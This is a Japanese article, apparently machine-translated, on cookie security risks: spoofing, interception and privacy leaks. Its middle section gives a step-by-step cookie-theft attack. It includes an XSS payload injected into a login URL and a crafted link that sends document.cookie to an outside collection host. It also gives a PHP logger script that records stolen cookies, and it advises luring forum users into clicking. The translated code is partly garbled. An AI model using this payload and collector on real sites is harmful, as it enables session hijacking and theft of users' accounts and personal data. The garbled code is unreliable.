Cookieの目的は、ユーザーに利便性をもたらし、Webサイトに価値を追加することであり、一般的に深刻なセキュリティの脅威をもたらしません。 Cookieファイルはコードとして実行することも、ウイルスを送信することも、ユーザーに独自のものであり、作成したサーバーによってのみ読み取ることができます。さらに、ブラウザは通常、300個のCookieのみを保存でき、各サイトは最大20個のCookieを保存し、各Cookieのサイズは4kbに制限されています。したがって、Cookieはハードドライブを埋めず、「サービスの拒否」攻撃方法として使用されません。
ただし、ユーザーIDの代替として、そのセキュリティはシステム全体のセキュリティを決定することがあり、Cookieのセキュリティは無視できません。
(1)Cookieは、ユーザーのアカウントID、パスワードなどの情報を記録し、通常、MD5メソッドを使用して暗号化され、インターネットで渡されます。暗号化された情報は、インターネット上で不純な動機を持つ一部の人々によって傍受されたとしても、理解することはできません。ただし、問題は、Cookieを傍受する人がこれらの文字列の意味を知る必要がないことです。誰かが他の人のクッキーをサーバーに提出し、検証に合格できる限り、彼らは被害者としてウェブサイトにログインできます。この動作は、クッキースプーフィングと呼ばれます。
違法ユーザーは、Cookieを介して対応する暗号化キーを取得し、ユーザーの電子メールやアカウント情報を含む正当なユーザーのすべてのパーソナライズされた情報にアクセスし、個人情報に深刻な害を引き起こします。
(2)クッキー傍受
Cookieは、ブラウザとサーバーの間にプレーンテキストで送信され、他の人が簡単に傍受および悪用されます。 Cookieは、Web通信を傍受できる人なら誰でも読むことができます。
Cookieが違法ユーザーによって傍受され、有効な期間内に再生された後、違法ユーザーは法律ユーザーの権利と利益を享受します。たとえば、オンライン読書の場合、違法ユーザーは料金を支払うことなく電子雑誌をオンラインで読むことができます。
Cookieを傍受する方法はいくつかあります。
(1)プログラミング方法を使用して、Cookieを傍受します。以下は、2つのステップで完了する方法の分析です。
ステップ1:Cookieを収集し、分析し、URLを構築する必要があるWebサイトを配置します。まず、Cookieを収集するためにWebサイトを開きます。ここでは、http://www.xxx.netであると仮定し、Webサイトにログインしてユーザー名「<al>」(引用符を除く)を入力し、データを分析してパケットをつかみ、次のコードを取得します。
http://www.xxx.net/txl/login/login.pl? username = <al>&passwd =&ok.x = 28&ok.y = 6;
「<al>」を次のように置き換えます
"<script> alert(document.cookie)</script>"再試行してください。実行が成功した場合は、URLの構築を開始します。
http://www.xxx.net/txl/login/login.pl? username = <script> window.open( "http://www.cbifamily.org/cbi.php?"%2bdocument.cookie)
その中で、http://www.cbifamily.org/cbi.phpは、ユーザーが制御できるホストのスクリプトです。 「%2B」は、「+」が空間として処理されるため、シンボル「+」のURLエンコードであることに注意する必要があります。このURLは、フォーラムに公開されて、他の人にクリックするように誘導できます。
ステップ2:PHPスクリプトを準備して、Cookieを収集し、ユーザーが制御できるWebサイトに配置します。未知の人が構築されたURLをクリックすると、PHPコードを実行できます。このスクリプトの特定のコンテンツは次のとおりです。
コードコピーは次のとおりです。
<?php
$ info = getEnv( "ourery_string");
if($ info){
$ fp = fopen( "info.txt"、 "a");
fwrite($ fp、!info。 "/n");
fclose($ fp);
}
ヘッダー( "場所:http://www.xxx.net");
?>
このコードをネットワークに置くと、全員のクッキーを収集できます。フォーラムでHTMLコードまたはフラッシュタグが許可されている場合、これらのテクノロジーを使用してCookieを収集してフォーラムに配置し、魅力的なトピックを作成して興味深いコンテンツを作成し、多くのCookieをすばやく収集できます。フォーラムでは、この方法によって多くの人々のパスワードが盗まれました。
(2)Flashのコード隠された危険を使用して、Cookieを傍受します。フラッシュにはgeturl()関数があります。 Flashはこの関数を使用して、指定されたWebページを自動的に開き、ユーザーを悪意のあるコードを含むWebサイトに導く可能性があります。たとえば、ユーザーがコンピューターでフラッシュアニメーションを楽しむ場合、アニメーションフレームのコードがインターネットに静かに接続されており、クッキーを収集して他の有害なことを行うことができる特別なコードを含む非常に小さなページを開く可能性があります。 Flashファイルの内部関数であるため、WebサイトはFlashのこのアクションを禁止することはできません。
(3)Cookiesリークネットワークプライバシー
クッキーがオンラインプライバシーリークにつながる主な理由は、!商業的利益によって推進されることです。 eコマースの台頭とインターネット上での巨大なビジネスチャンスの出現により、一部のWebサイトや機関は、Cookieを悪用し、検索エンジンテクノロジー、データマイニングテクノロジー、さらにはオンライン欺ceptionテクノロジーを使用して、訪問者の許可なしに他の人の個人情報を収集し、ユーザーデータベースの構築や広告の送信などの利益を達成し、ユーザーの個人的なプライムの吹き替えを引き起こします。 「Cookie Informationの送信の開放性。Cookieファイルには特別な配信プロセスとテキスト特性があります。安全に暗号化されていないCookieファイルは、サーバーとクライアントの間に送信され、個人情報の漏れに簡単につながる可能性があります。
上記はすべて、Cookieのセキュリティに関する個人的な理解です。不作為がある場合は、それらを修正してください。